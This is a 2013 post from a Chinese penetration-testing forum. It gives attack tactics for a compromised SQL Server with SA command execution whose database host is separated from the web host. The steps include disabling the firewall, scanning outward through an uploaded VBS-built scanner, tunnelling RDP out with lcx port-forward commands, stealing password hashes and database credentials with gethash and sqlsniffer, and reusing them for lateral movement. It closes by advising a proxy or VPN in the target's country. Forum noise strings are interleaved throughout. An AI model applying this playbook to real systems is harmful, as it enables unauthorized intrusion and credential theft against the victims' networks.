中国网络渗透测试联盟
标题:
SA权限网站和数据库分离的一些思路
[打印本页]
作者:
admin
时间:
2013-2-16 21:46
标题:
SA权限网站和数据库分离的一些思路
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
: w1 m( s" x$ [4 Z0 W
, s" D, i5 q; g0 R! g7 `( G0 S5 J
6 r4 Z( M( G7 x9 u% q) f
4 \ I5 G: Q% d' x
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
! L( k) f' z$ H
* @1 I; `6 C* h
' U. i! R& Q, s
一、DB机有公网IP.
# H( K2 S* P- J* W9 m+ P/ H4 Q0 `# t
# x7 s' @5 T, B8 X7 D- H
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
; u" H$ v" R- |- C3 F- W
+ Z, [5 b# D( _) M" }4 }
' `4 i) i2 L7 h, X2 N
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
( D& W" }- J6 D+ G1 ?6 c
! r% W( _# }) t9 F: K4 l
- S8 O# a/ k: k% ]" n
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍.
www.2cto.com
B! C E1 v# a0 t k; N' J* m% \
* v- s# f- Z1 l
. a9 `) `" o* F0 I% j, u
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
$ Z. Q; q7 ~' W+ q
) Q5 D8 g0 E% ] U) @/ u q5 R
6 o/ M1 q- B7 d6 o3 w3 I, k
1 U5 P) R, I% R2 R8 m
二、DB机只有内网IP
+ l6 x4 i1 Y, z; p' a2 P+ z8 ~) u5 H
; Z2 T- J$ V N+ |9 z% B
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心
, 拿密码尝试登陆web后台等.
, a9 {* C/ _$ N& ~, _
. d; I" [) o: X
0 T& S3 i) L; H# ^1 T
2:停掉防火墙和IP策略再从内往外扫描.
9 F" ]8 P0 @( n2 s Q
5 I8 m% a$ D1 L* H
* r* R+ N8 |, U e
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
1 k1 [1 [+ P& E& A
, e O( ?5 [6 w( a; Y6 B1 ^/ j
0 I) g/ M0 E6 W( g/ F
4:学会密码规律分析往往会有惊喜.
4 s$ Z, F- z) J
. F7 v6 p7 \, E5 w6 _# f/ S5 [
' n$ k0 C8 c! \( ^0 L
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
8 G8 _' p, P& c& I
3 } j# Y F' S* T
5 \ s+ `/ o2 c5 E, Q- A* l6 s$ g- Z
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2